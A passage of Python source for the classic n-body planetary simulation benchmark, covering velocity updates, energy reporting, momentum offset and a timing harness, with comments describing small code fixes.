        for pos_idx, name_a in enumerate(BODIES_KEYS):
            (xa, ya, za), vel_a, mass_a = BODIES[name_a]
            for name_b in BODIES_KEYS[pos_idx + 1:]:
                (xb, yb, zb), vel_b, mass_b = BODIES[name_b]
                dx = xa - xb
                dy = ya - yb
                dz = za - zb
                # dt / |r|^3, computed once and shared by both bodies
                scaled = dt * ((dx * dx + dy * dy + dz * dz) ** (-1.5))
                pull_on_a = mass_b * scaled
                pull_on_b = mass_a * scaled
                vel_a[0] -= dx * pull_on_a
                vel_a[1] -= dy * pull_on_a
                vel_a[2] -= dz * pull_on_a
                vel_b[0] += dx * pull_on_b
                vel_b[1] += dy * pull_on_b
                vel_b[2] += dz * pull_on_b

        # Drift: move every body along its (freshly updated) velocity.
        for name in BODIES_KEYS:
            pos, (vx, vy, vz), _mass = BODIES[name]
            pos[0] += dt * vx
            pos[1] += dt * vy
            pos[2] += dt * vz
def report_energy(BODIES, BODIES_KEYS, e=0.0):
    '''
    Compute the total energy of the system and return it.

    Adds, onto the starting value `e`, the potential energy -m1*m2/|r| of
    every unordered pair of bodies and the kinetic energy m*|v|^2/2 of every
    body. Does not mutate BODIES.
    '''
    # Fix: removed dead local `seenit = set()` that was never read or written
    # after initialization.

    # Potential energy: each unordered pair counted exactly once.
    for idx, body1 in enumerate(BODIES_KEYS):
        ((x1, y1, z1), v1, m1) = BODIES[body1]
        for body2 in BODIES_KEYS[idx+1:]:
            ((x2, y2, z2), v2, m2) = BODIES[body2]
            (dx, dy, dz) = (x1-x2, y1-y2, z1-z2)
            e -= (m1 * m2) / ((dx * dx + dy * dy + dz * dz) ** 0.5)

    # Kinetic energy of every body.
    for body in BODIES_KEYS:
        (r, [vx, vy, vz], m) = BODIES[body]
        e += m * (vx * vx + vy * vy + vz * vz) / 2.

    return e
def offset_momentum(BODIES, BODIES_KEYS, ref, px=0.0, py=0.0, pz=0.0):
    '''
    Set the velocity of `ref` (the body at the center of the system, a
    (position, velocity, mass) triple) so that the system's total linear
    momentum is zero. Mutates ref's velocity list in place.
    '''
    # Accumulate the negated momentum of every body.
    for name in BODIES_KEYS:
        _pos, vel, mass = BODIES[name]
        px -= vel[0] * mass
        py -= vel[1] * mass
        pz -= vel[2] * mass

    # Give the reference body exactly the velocity that cancels it out.
    ref_vel = ref[1]
    ref_mass = ref[2]
    ref_vel[0] = px / ref_mass
    ref_vel[1] = py / ref_mass
    ref_vel[2] = pz / ref_mass
def nbody(loops, reference, iterations):
    '''
    Run the n-body simulation on the module-level BODIES system.

    loops      -- number of outer loops; the total energy is printed after
                  each one
    reference  -- key of the body at the center of the system (e.g. 'sun')
    iterations -- timesteps advanced per loop (step size fixed at 0.01)
    '''
    # Zero the system's net momentum by adjusting the reference body.
    offset_momentum(BODIES, BODIES_KEYS, BODIES[reference])
    for _ in range(loops):
        advance(BODIES, BODIES_KEYS, 0.01, iterations)
        print(report_energy(BODIES, BODIES_KEYS))
if __name__ == '__main__':
    import timeit
    # Fix: the original used the Python 2 print statement
    # (`print timeit.timeit(...)`), a SyntaxError under Python 3 and
    # inconsistent with the print() calls used elsewhere in this file.
    # Time one full run of the benchmark and report the elapsed seconds.
    print(timeit.timeit("nbody(100, 'sun', 20000)",
                        setup="from __main__ import nbody", number=1))
| true |